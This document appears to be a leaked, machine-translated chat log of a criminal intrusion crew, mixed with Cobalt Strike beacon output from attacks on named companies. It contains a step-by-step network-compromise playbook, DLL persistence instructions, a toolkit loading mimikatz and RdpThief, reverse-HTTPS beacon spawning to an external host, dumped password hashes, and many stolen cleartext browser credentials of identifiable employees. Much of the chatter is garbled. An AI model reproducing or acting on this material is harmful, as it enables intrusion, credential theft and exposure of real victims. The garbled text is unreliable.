                                 DHCP Server: 172.31.190.17
                                 IP address(es)
                                 [01]: 10.51.128.172
                                 [02]: fe80::896f:a415:af2d:57b1
                           [02]: Intel(R) Wireless-AC 9560 160MHz
                                 Connection Name: Wi-Fi
                                 Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: Yes
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes

``What's the axis? Because without AV?
[+] Determining what EDR products are installed on localhost...
[+] No EDR products found! Operate at your own risk!
``````
beacon> psinject 13584 x86 Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt"
[*] Tasked beacon to psinject: Get-DomainUser -Server 10.50.212.45 | out-file -filepath "C:\ProgramData\ad_users.txt" into 13584 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:
ERROR: FindAll : Exception calling "FindAll" with "0" argument(s): "The server is not operational.
ERROR: "
ERROR:
ERROR: At line:5253 char:52
ERROR: + else { $Results = $UserSearcher.FindAll <<<< () }
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DotNetMethodException
ERROR:
``The ad_users in the mail address will be the real domain, if it will be .local then most likely something is wrong, check processes first, browser, ad infochet names are strange...``
txbaybcraig txbaybcware TXBayCGarza
txbaycharki txbaycphill txbaydblake
txbayecooke TXBayFBanks TXBayGHebel
TXBayGLane txbayjwille TXBayKSchoe
txbaymkurz txbaymobile txbayoffice
TXBayParts txbayparts2 txbayrmedin
TXBayRSeide txbayrvince txbayrzenke
txbaysdtv txbaytech1 txbaytech10
txbaytech11 txbaytech12 txbaytech2
txbaytech3 txbaytech4 txbaytech5
txbaytech6 txbaytech7 txbaytech8
txbaytech9 TXBayTechn txbaytechn2
txbaytlucas TXBayTStein txbaywhouse
TXBea4PBeau txbeaablanc txbeabblack
txbeacsory txbeacthibo TXBeaDBertino
txbeadblanc TXBeaDLivin txbeadrive1
txbeajborda txbeajbowen txbeajlariv
txbeajleach TXBeaKHoffm txbeaklee
``try to take off through the shell didn't create through run just displayed a list of name+group
through the shell did not work with the same error is it an external domain? try to run adfind.exe directly without ``button
beacon> run AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 347720 bytes
[-] could not spawn AdFind.bat: 5
``within run?
beacon> shell AdFind.bat
[*] Tasked beacon to run: AdFind.bat
[+] host called home, sent: 41 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C AdFind.bat: 5
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir: 5
``Not localreal domains plz''
usr2-2[LP-BC8DTT2]BEngeron/15956|2020Oct15 22:33:49> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
WOSupply.local
``Look at the aduser and tell me if it happens or not, but it seems to be a real session
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 231 bytes
[+] received output:
BigAssFan.local
``or reality? is it a trickBigAssFan.local on the classic - get the session, write the domain here, create a confab and then as usual for nothing good, thank youmaximum you will look for profiles for the team server do not think tomorrow will throw the guide, it is as understandable tomorrow will be no questions questions? tomorrow you and I will deal with cob settings and other things, with servers today will solve the problem plan following
```
104.194.11.160:41476
SISmByXnBD8YYmmWFNtumTJWsX8YQhO4O6VR
```
here come the sessions, separate the AV/Honey from the normal networks and work with them, the coba is clean, you can pass yourself from here or work in it, depends on the dirt your kobya already wrote about it so we were told to fuck up now, so less you fuck up later because you busy@user7 about the coba later this is familiar ?I'm not asking how you infect the victim, I'm asking how you crypt the cob and stuff like session distribution between the teams how do you prepare the cob ?well, here's how you get the sessions ? @tl2 and silence, thank you at least for such answers (ok, then how to configure ? setup - please if you do not know where to get servers I will not tell here@user8 already wrote himself think about it and ask us first we want an answer to this question, where and how can you tell us ? first thing: take servers where will? what, how and why do we know the order of getting sessions on the cob
1. how to prepare a cobu
2. what to do
3. how to do it correctly
4. the principles of work to explain everything we need to bring it to us this allcoba need an algorithm for obtaining a new coba for each day with new configs, gaskets, servers
clean after configurations? next after what? hmm. let's say, what next? or how to understand what I wrote? thank you all clear server registration, configuration of a web server with a domain and ssl which is sent to the server kobys hear hearPlease hear my cry from the soul !A to Z needs a complete scheme, not links to gita@tl1 @tl2 and about "spacers" in detail and the whole list of preparations setup cobo Explain in full the principle of getting cob@tl1 @tl2 Please take 10-15 minutes now, than to be distracted by our pings with stupid questions@tl1 @tl2
How to make sure the cobs arrive without pestering you with this? after 10 da@tl1 @tl2what about today's nets?:smirk: you will be the last one in any case) tell me if there are mistakes, otherwise it will not work and I will be the last one to blame!
https://helpdocpt.club/threads/windows-%D0%A4%D0%BE%D1%80%D1%81-%D1%83%D0%B4%D0%B0%D0%BB%D1%91%D0%BD%D0%BD%D0%BE%D0%B3%D0%BE-%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D1%85-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA.43/есть лингвисты? проверьте
https://helpdocpt.club/threads/%D0%9E%D1%82%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD%D0%B8%D0%B5-windows-defender-%D1%87%D0%B5%D1%80%D0%B5%D0%B7-%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%BE%D0%B2%D1%8B%D0%B5-%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA%D0%B8.42/ну if they are finished it is unlikely that there is something else to do there also mother-in-law lpe exploits translate the guide to disable vin def for forum nonstop check everything to have time to deal with the forum and additional modules neah (the old have not arrived? no (no sessions?) HelloHelloHi all
if there are sessions - waitGood night)good night tomorrow by 3sessions in slip files deleted ok for today.yesTomorrow work? check your ballymore fell off or not.  my offs worked for an hour)) #1-done-rtpcompany-com has a system so you can change the status of the result ok just access to rps apparently)and he is not LA and the first - current last time there was no funny thing, just ran SharpShares` ``
[+] received output:
Shares for 27L28:
	[--- Unreadable Shares ---]
		HP LaserJet Pro M404dn
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ print$

[+] received output:
Shares for HENDSTORAGE:
	[--- Unreadable Shares ---]
		Gina(HP Color LaserJet CP3525)
		Gina(HP LaserJet 400 M401dne)
		HP MFP477 QA Lab
		IPC$
		Matt(HP LaserJet 400 M401dne)
		Warehouse Office MFP(HP LaserJet 400 MFP M425dn)
		Warehouse Office(HP LaserJet 400 M401dne)
	[--- Listable Shares ---]
		ADMIN$ Apps C$ D$ Distro E$ GPO_Installs InstallApps ISOs Maint Office print$ Shared Users

``and select different groups do we have admin rights there?
```
\30L71.rtpco.local\ADMIN$ - Remote Admin
\30L71.rtpco.local\C$ - Default share
\30L71.rtpco.local/IPC$ - Remote IPC
I understand it correctly, do I have to check 415 machines by name in ad_compacts now? from different OU[ ](https://mediaeveryone.com/channel/general?msg=8gp4Z6s3knM7Z7iWp) didn't understand it and I asked for respawnsession failed at one moment I've played with both dir and lhome[ ](https://mediaeveryone.com/channel/general?msg=o6tMFScKZHG3cJJ6y) from different groups either it gives nothing or access is denied[ ](https://mediaeveryone.com/channel/general?msg=7nTdHajYQxDGJfPsA) 415there's jurl, username, password, click on the list, log in to the site, how do you get information from Lastpasa? how much access?? everywhereb access to the fs is denied and remot tula works, why is it vmic and even if even dir does not give vmic?dir[ ](https://mediaeveryone.com/channel/general?msg=DcCxwQPhssGgSCPLZ) only vmik checked?
what does it say?
Donald J. Trump (@realDonaldTrump) / Twitter - Mozilla Firefox
=======
[control][ctrl]
``He also tweets it#ballymoregroup-com Found a VPN, took off my browser. the passwords from my browser to the VPN didn't work. Installed keylogger and since now on the screen lockscreen - there is a chance to catch a password. while looking in the files on the disk. SearchOutlook.exe not looking for shit.[ ](https://mediaeveryone.com/channel/general?msg=oWPnwwNseAH2uEowX) golden ticket done, found alive yes, check admin's comps (fs, ff) in #1-done-rtpcompany-com spawnas not working under any creeds, under the current polzakami took the balls off
SharpShares: no listable shares besides print$
ShareFinder: where it says Remote Admin - it won't let me in
 
in #waterway-com check passwords lastpass/logmein, except mharper'a I do not see anyone yet, at the same time watching the keyloggerBut no change, started looking for mozilla on computers where admins are pledged and check the password file from the keyloggerwrite what you have on progress not in that window) again some matyladno now look yyudshp who knows it)))) where it saves the log? no configurations...exactly there, i did not notice it in the toolchain saw the keylogger? is there a third-party keylogger worthy of attention? if @user7 has something let him drain it there you seem to have everything there is a conf) `rawint.com ` no dotsink? well work if it flew to what edition of sofosag seems only sofos and winndef` ``
16464 972 LockApp.exe x64 1 BALLYMOREGROUP\rpearce
 3988 748 SavService.exe
 5184 748 SAVAdminService.exe
 5372 748 ALsvc.exe

``whenever there is a hardwindefc, see what else on ps see the red processes``.
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] savonaccess.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] Sophos Found!

``I noticed that edr kvetch does not show all through edr + psst tell me what AV + because your coba was the cleanest show session put your shelkodblya, I had in the old one for some reason came ...-you do not fly? so not yet took silkodblya) and I do not fly by the classical 20 minutes put the scanners do not sleep as well by the way come silkods +- + preferably clean all koba have?+ + there are not even files AD in the confab, apparently a serious AB at the entrance to the baly recommend access to the VPN #ballymoregroup-com and here +1 together with @user7 + here one man # 1-done-rtpcompany-comobe already had two nets to work I, by the way, also seem to have gone stale I do not have clean kobe?add me in #evo-com:man_raising_hand: i'm in place:space_invader:hiprivWhat's the Mon by what time? Yeah, everyone
yes, all:man_shrugging:a couple more restored to be sure in a long slip then lies:man_shrugging:then it should also reach the admin...the second as well knocks in the billd should reach if it goes first``
beacon> shell ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com
[*] Tasked beacon to run: ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com
[+] host called home, sent: 77 bytes
[+] received output:

Pinging asdasdasdsa.sadasdsadsa.kalarada.com [195.123.214.148] with 32 bytes of data:
Reply from 195.123.214.148: bytes=32 time=131ms TTL=49

Ping statistics for 195.123.214.148:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 131ms, Maximum = 131ms, Average = 131ms

`` hmm.
the domain works...this is how to ping asdasdasdsa.sadasdsa.domain.com -n 1 I don't mean just check otherwise) ``
beacon> shell ping -n 1 kalarada.com
[*] Tasked beacon to run: ping -n 1 kalarada.com
[+] host called home, sent: 53 bytes
[+] received output:

Pinging kalarada.com [195.123.214.148] with 32 bytes of data:
Reply from 195.123.214.148: bytes=32 time=131ms TTL=49

Ping statistics for 195.123.214.148:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 131ms, Maximum = 131ms, Average = 131ms

beacon> shell ping -n 1 www.kalarada.com
[*] Tasked beacon to run: ping -n 1 www.kalarada.com
[+] host called home, sent: 57 bytes
[+] received output:

Pinging www.kalarada.com [195.123.214.148] with 32 bytes of data:
Reply from 195.123.214.148: bytes=32 time=133ms TTL=49

Ping statistics for 195.123.214.148:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 133ms, Maximum = 133ms, Average = 133ms

I`m not sorry) test it) okay, do not touch the domains can not knock for other reasons if there are bots in the network on the backdoor admin - then the domains are alive directly from the car where you run) well, ping from where does not knock knew, but the fact that does not knock for 3 zakrepaty not know what?it means "it will" and if it gives out ipiniknado pinging level 3 domains it is very easy to check I only have 2) to check? or you do not have others? why? muncucfarfarisaa which ones are added?) I do not remember the other 2 domains have a mask
```
Adobe autoupdate#41162 1/22/2021 10:43:28 PM Running
``Let's change domains (there's no backups) there's one print server that's restored all the servers are important Why backups?
```
	main.crispregional.org 10.1.0.22 https SYSTEM * CRHSBACKUP
this is a new crispispisp version of the 10.1.1.22. if you want to copy and paste it into another crisp, it needs to be done before monday, i suggest we finish this today.
1. Gathering initial information about the domain and the environment
	- Full domain name
	- DCs list
	- LA\DA\EA
	- Password policy
	- PS
	- EDR
	- Systeminfo
On the basis of this information we see what kind of network we are looking at: a workgroup with VPN, a lab, a work network. If you can't make a conclusion from step 1, go to step 2.

2. Collecting BP information
	- ADFind
	- ADFind trust
If the total size of the files is more than 40mb, you need to put them into the archive. After analyzing the AD we make a conclusion about the network type. If it is a workgroup without a visible domain, we skip it and get the next network to work on. If a full-fledged network, move on

3. Gathering additional information about the domain and environment
	- Browser Dump
	- Seatbelt
	- kerberoast, asreproast
	- DuzzleUP
	- WinPEAS
	- Watson
	- GPP
	- ShareFinder
	- Check ZeroLogon
all files in the process and logs you put in a folder with the name of the external network domain, under the names corresponding to the utilities you run. You pass the brute-force hashes to team lead 2

4. Additional actions. During ShareFinder run, we run persist on the entry point (ONLY IF YOU SUGGESTED IT)
	- generate a NEW build for EVERY run
	- hide dll in user folders (preferably appdata and as far away as possible)
	- run it, check if the dll is not deleted + staska appeared, write to me: hostname, startup rights

all files are duplicated in the conf, as well as stored in a separate folder at your local location. Information about DC, LA, DA, EA, and all the passwords found in the process you put in a separate file creds.txt

5. If during or after the ShareFinder, as well as a quick brute-force hash, you get the opportunity to get out of the entry point, then by all means take advantage of it. Such a network gets priority and is not interrupted
``Yes, that's what I meant) thank you)``Good morning
Maybe zerologon?:space_invader:NiGood night, it turns out? ok tomorrow a lot of work, maybe we will close from scratchChecked cpcc.edu no results.  I have set up a vps, tomorrow I will bring everything up. I searched all over my surfboard and did not find any files and folders and just in case I had to roll out the os again.Pinged all that is pinged from the AD and scanned the balls on the pinged machines (in the conf. skipped).
Coba and empire sessions don't go up. i have already got the ready kit and wanted to try it then psh empire`https://ucfapps.cloud.com/citrix/storeweb/`.
it worked in it, the data does not get everything, no way to run the exe, in ptsh only managed to pull the server, and that with its own fuck ups, in the coba is not pulled, I think about how to separate further, tomorrow I will try something else? 2 vps configured completely according to the list
3 now in progress, here is the final stage, the empire is in conflict
made a template guide on how to configure

1 wpc given to @user3
1 is ready to be given away
1 will soon be ready to be given upafter tomorrow I expect you at 12:00 a.m. in 12 minutes at homewrite me the result of your work todaytake it there msf and psh empirethank you I'll give you 3 debiannaw what do you likecaw@user8 you like lincus? got it this weekend they brought a new one, I will move to it, this began to often hang up another computer? I will now install another computerthere I @user7? @user9 got sick
@user3 is late Where is everybody today? Not many of you...then I'll give you a new one. I don't know what to do with this grid.
there was also `healthcare.com`, but there, according to your arguments, got burned (nothing ran, no google chrome, no kmd, no psh)
in `unf.edu`, worked with it for a while and at one point the citrix credentials have changed, nothing yet? and now what about the tasks?[ ](https://mediaeveryone.com/channel/general?msg=Qdo9AtdEjZuyY5et4) you wrote that I have on my tasks kovyvayu asu.So what do you have on the tasks? and well)yes norms)well, how did you rest?
inside ad infos, hashes, creds.txt etc
```

```
And another thing, since the report will be an archive, next to the ad_*.txt files you make a file creds.txt in which
DCs
DA
EA
LA
cleartext creds if there are any
``If there are any, delete it:
```
include(script_resource("modules/insleep.cna"));
``````
popup beacon_bottom {
    menu "TW-toolkit"{
        
        include(script_resource("modules/checkvm.cna"));
        include(script_resource("modules/clearev.cna"));
        include(script_resource("modules/FireWall.cna"));
        include(script_resource("modules/persistence.cna"));
        include(script_resource("modules/RDP.cna"));
        include(script_resource("modules/Win2012mimikatz.cna"));
	include(script_resource("modules/cmd.cna"));
	include(script_resource("modules/sleep.cna"));
	include(script_resource("rdpthief/RdpThief.cna"));
	include(script_resource("modules/collect.cna"));
	include(script_resource("modules/chrome.cna"));
    }
}

``Only here or only here? Do you in the cobas also arrives? +, one left ... tense for the future, remove this plugin already removes sessions more than 1 minute asphyxiation just servak where YES for a long time or did not go at alla then seshchka offnut and all take a place on any server `` ``
nitial beacon from SYSTEM *@192.168.1.7 (DC-01)
``Why the slip? go to the server 1 team yes, already working with him, the second has just configured, accesses are distributed there slip put while I sort the files is mineThose in the general cob?+while we can re-sort what we got and msf to configure)))) it's not even the server? no sessions left at all? + well bnpmedia.com exactly + all fell off? dom.helpathome.com so in the end, what is in work now? sort what we got earlier, then the rest are busy?only FRIVER.LOCAL is up and running now?[ ](https://mediaeveryone.com/channel/general?msg=vvBvMwABd6JENGyrv) what domain? FRIVER.LOCAL-+DIV420-4G350W2 (FRIVER.LOCAL)write down what online remained1minute+failed sessionTell me in sootvetstvennoy conf confine to throw allvatitoki write to confine from where hashine the fact kst that this local user no yuz all easierspawnas jump etc can be from other errors in the process check through net use ``
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:15:59> spawnas .\Administrator Shotgun913 https
[*] Tasked beacon to spawn windows/beacon_https/reverse_https (regbest.com:443) as .\Administrator
[+] host called home, sent: 261167 bytes
[-] could not run C:\WINDOWS\system32\mstsc.exe as .\Administrator: 1326
Kernels look different so it's hashes) ah, I also uploaded kernels and there was also an admin who uploaded hash above...what to whom7 it's to whom?
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4108e652bab10290df6e95cbdf7edbf5:::Shotgun913
``````
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:4108e652bab10290df6e95cbdf7edbf5:::
[+] ASPNET:1012:aad3b435b51404eeaad3b435b51404ee:e2ea6d8835d3d2a359a2799ef968ddfc:::
[+] Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] IUSR_COR-CRM-02:1009:0bf5649a7904243f88d27b3ca2c8f898:aa649f125693df03b2a571e208f27c91:::
[+] IWAM_COR-CRM-02:1010:5fd1256db0722b04b9718e35b2be2281:0e6b14839b56f9f18250a4349c1d9a9f:::
[+] SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:9c8006d35e9441ab3d8ca1883c0f3fdc:::
[+] ___VMware_Conv_SA___:1020:aad3b435b51404eeaad3b435b51404ee:b2bebb7eddaa6d58e30fc3665f85872a:::

``and then commands like this
wdigest
tspkg
kerberos
ssp
livessp
hashdump
``use mimikatz possible mimik to pullenum_utnand try to remove the module kobaThen the session does not fly in koboltot write while the results of the work in their confumb will be in the hash DAokey) now pour the case and continue to search) yes by the way did you graft the server?well, okay) there is a matter of taste)He mne like my brother, we are with him from the first version together)))) or something like thatArmitage -View - TableDon't make the default awful view in arma by defaultkstastatil shot out of turnsmith for smb_login from his computer, will die?if no more local connects you can continue to work operatively)already just a session on the vpc and disconnect it good for you that you have made a breakthroughperfectly make the connection that you have received to pull? on these vpc why? yes you and said that deployed msfnahera i gave vpc under msf? question i drink somethingDo you also pulled on your pc before that?kzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzznmDa through a proxy. We didn't do it any other way. Through armitage did but it needs a session Seriously on your pc pulled or what? I'm through a proxy bindomili real shot? on the VPS? And seriously? Definitely shot on his own pbut do not say that on his pc pulled through?) and for `` For?
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 185.150.190.204:2103) at 2020-10-06 23:07:43 +0300

``I didn't look at it that way, but there are no strange groups))) thanks for the tip at least someone checked it) no have you checked it? but in ad users ivan has member_of strage_users and your user DOMAIN\ivan what you have in LA is written
DOMAIN\strange_uesser I'm talking to the localgroup Administrators or do you analyze the groups and look for the current user in the list? )))))))) by DOMAIN\uesser how do you determine LA? ok if you find something I will throw here in an hour, only in brute force will go to[ ](https://mediaeveryone.com/channel/general?msg=W4apDrxrep52uAxre) nice to hear that) yes-I think the system will soon pass too, right?we don't have any LA inputs from the current live sessions?+I hope everyone heard and all made notes on this point understood, a little later with grandfather check citrixnothing on your pc you do not deploy, do not connect, do not establish a connection, for this you all issued you or very poorly documented, or lazy to look or ask guys stop it if you through yourself soks put, you can and msf sessions to pull on themselves, why vpc gave out rdp, browsers, etc. and i said that i should work on the network through vpc proxies why do we need a winDoc you had a question if you remember everything is ok, i did not hook up I wrote a long time ago you wanted a citrix proxy hook up made in coba do not say that you go from your pc to the network in foxecacom browsers and what proxies?I delete files immediately it's because of proxies that I prescribed in the browserAll he develops and chat))) well I read or understand it wrongWhy? He has a rocket chat hung up and he can not respond Well, how can he drop out of the chat and because of this in what question? What exactly he scans through a VPN? And how is it related? he scans for 17-10 mb that will fall out. and @user7 normal? oh, that's the first one I spammed and he just hung up) Dak I dunno) I do not remember that there would be something to do) So I clarify the grid for @user7 and you help him, I just asked if you left the file or not) and @user7? and I worked there? I do not mind, but it hangs. file or left there? strange that you) someone is directly rushing to me)))))
```
10/06 20:37:31 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:38:32 *** initial beacon from abinash.pattnayak@192.168.9.85 (ABINASHP)
10/06 20:39:45 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:41:37 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:45:43 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:49:48 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:53:54 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 20:58:00 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:02:06 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:06:11 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:10:17 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:14:22 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:18:28 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:22:34 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:26:40 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:30:45 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:34:51 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:38:57 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:43:03 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:47:09 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:51:15 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:55:20 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 21:59:26 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:03:32 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:07:38 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:11:43 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:15:49 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:19:55 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:24:01 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:28:07 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:32:12 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:36:18 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:40:25 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:44:31 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
10/06 22:48:36 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2)
``I understand that it didn't come back, help user7@user3 didn't get to YES? in process--didn't get up to systems yet? or yes? i say ok or no after startup, you can't start it1 startup and all one time my cob session +
start working
```
dom.helpathome.com
``so this dampon did not say what, just said that he broke through svoitom how come back can you ask it? ``kiwi_cms'')) to the toilet where? he went out, do not ask (kiwi? svoitom what method? and all have tried his method?somewhere other than the grid @user3 were the rights systems?[ ](https://mediaeveryone.com/channel/general?msg=ZbXb97rLKmgmCG7Ff) judging by the name of the polzak may well be LA@user3 can help so far others took the session but have not yet checked because the sessions are falling off - looking for a less stable processThis is not enough! there were promises that the fuck it will be no free @user9 @user1 how are you doing? within an hour can come back as usual wait an hour there are 2 new sessions in the input cobaFailed skavot and do not see the vpn on and the pc is not in the domain at all how is the connection going to another name?how can I get a hellfind and still not find my machine?.immediately here is the name of the confabdisassembled in the coba came dead and new and then the questions, kerbs and other stuff is the scriptthe first message in the confab - DA, EA, LA, DC, ad infoDo yourself tutorial on "got the first session "What are you talking about?guys, honestly fucked repeating FIRST MESSAGE IN CONFECH SESSIONS back? in an hour will not arrive will be assigned to a couple on the current you from half an hour to an hour if it comes right away will notify let one of their monitors kobutozhe right, while waiting can help colleagues answer questions ok, while waiting bad (you said there was half a gig of information have you not archived?or there's a piece of AD info left there? what did you manage to remove? @user1 also wait mb will returndalf@user3 yours arrived? well, yes) so we took exactly the server segment and separated from it subsnets /24 /16subsnets not everything speaks the truth) but subsnets `>cn: 172.I have no trusts. is that normal? + now i will download everything and start 2? 3 people have not yet reported anything about dll launches?awaiting the groupbos ask yes@tl1 chetu.com i work feedback on dll, yes)give me a name, i will create a confab and give dlltoday i will definitely "live" network)who has a kilometer network, hands and head will not be redundantOkJdu if it does not come will work in parezhdy while you still 20 minutes it fell off do not see that he wrote it off here?I have noSession he hasWhat do you mean not distributed yet? Or yesterday's maybe now come[ ](https://mediaeveryone.com/channel/general?msg=qg5eoj5jnJsiEBbcx) catching in the first cobaSad[ ](https://mediaeveryone.com/channel/general?msg=W65dEW3796gimsBqt) means a lot of information)now maybe reopen 1 to 1 noThere will be sessions? the main thing is not too much noise the bigger the network the easier to work in it) fell off ska!@tl1 took away ad_users not yet worked out - is this a normal grid? @tl1Povisley((((```
--- Chromium Credential (User: jessicak) ---
URL : https://mymails.chetu.com/owa/auth.owa
Username : jessicak@chetur.com
Password : Ll????

--- Chromium Credential (User: jessicak) ---
URL : https://mymails.chetu.com/owa/auth.owa
Username : jessicak@chetu.com
Password : /?X%W??m

--- Chromium Credential (User: jessicak) ---
URL : https://mail01.chetu.com/owa/auth.owa
Username : jessicak@chetu.com
Password : ?I36?U?

--- Chromium Credential (User: jessicak) ---
URL : https://apps.thinkhr.com/
Username : jessicak@chetu.com
Password : /?2?P?????

--- Chromium Credential (User: jessicak) ---
URL : https://login.microsoftonline.com/887b9831-597d-4e43-9f75-9ac91b93a5a7/login
Username : jessicak@chetu.com
Password : Sweet@8733

--- Chromium Credential (User: jessicak) ---
URL : https://app4.trackmytime.com/chetupayroll
Username : jessicak
Password : Chetu@123

--- Chromium Credential (User: jessicak) ---
URL : https://secure.sharefile.com/oauth/authorize
Username : et4rs@chetu.com
Password : TeamDMoney$7

--- Chromium Credential (User: jessicak) ---
URL : https://secure.sharefile.com/oauth/authorize
Username : et3rs@chetu.com
Password : SolidDeal$9

--- Chromium Credential (User: jessicak) ---
URL : https://app.berqun.com/app/dist/login.html
Username :
Password : HelpTeam1

--- Chromium Credential (User: jessicak) ---
URL : javascript:;
Username : et@chetu.com
Password : Admin4U

--- Chromium Credential (User: jessicak) ---
URL : https://www.snapengage.com/signin
Username : et@chetu.com
Password : AdminTeam3

--- Chromium Credential (User: jessicak) ---
URL : http://review.chetu.com/LoginForm.aspx
Username : jessicak@chetu.com
Password : Sweet@8733

--- Chromium Credential (User: jessicak) ---
URL : https://secure.sharefile.com/oauth/authorize
Username : et7rs@chetu.com
Password : Team7Clo$e

--- Chromium Credential (User: jessicak) ---
URL : https://apps.thinkhr.com/
Username :
Password : Acissej8733

--- Chromium Credential (User: jessicak) ---
URL : https://apps.thinkhr.com/
Username : jessicak@chetu.com
Password : Acissej8733!

--- Chromium Credential (User: jessicak) ---
URL : http://backbone:9090/Human-Resources/Lists/Leave%20Management/AllItems.aspx
Username : jessicak@chetu.com
Password : Sweet@8733

--- Chromium Credential (User: jessicak) ---
URL : javascript:;
Username : et@chetu.com
Password : Admin4U

--- Chromium Credential (User: jessicak) ---
URL : https://fundraising.stjude.org/site/TRR/547026355
Username : Jkay8733
Password : Sweet@8733

[*] Finished Google Chrome extraction.
``@user4 silence@user7 took the session 2 more? and then suddenly on the desktop....)in the conf conf, before running the dll, write down where you putDo you run through the shell rundll32 so with , comma exactly need? so, I give 1 dll in the conf, on 1 pc run. criteria:
-hide it away in user folders (in %appdata%) a few levels deep and mask the name as synonymous with those where you put
-Run it like this `rundll32 FULL_PATH_THE_DOLL\IMA.dll, entryPoint`
-Check that it hasn't deleted
-write in conf that you run and check the source file ``.
execute-assembly /SharpChrome.exe logins /showall
``+looks like normal 4 two see Done Capture as user9 in the sweatshop has already said so fucking much +[ ](https://mediaeveryone.com/channel/general?msg=vNxoz7iD8gcZgQHSv) in the input cobbler only @user9 confirmed + waiting + in the input cobbler who has the network "checked" farther differently, one again cmd off, the second has 3 pc for analysis @user7 already 3 input sessions)Domain ad.happay.what on AD?
beacon> execute-assembly /home/user/tools/ShWeb/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (Current User) ===

[+] received output:
  [X] Exception: The parameter is incorrect.



=== Checking for Firefox (Current User) ===



=== Checking Windows Vaults ===

[-] Invoke_3 on EntryPoint failed.

``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (Current User) ===
  [X] Exception: The parameter is incorrect.



=== Checking for Firefox (Current User) ===



=== Checking Windows Vaults ===

[-] Invoke_3 on EntryPoint failed.

No rights in the conhost and swhost I can't get in.
```
adazure.app Administrator dhcpadmin.app
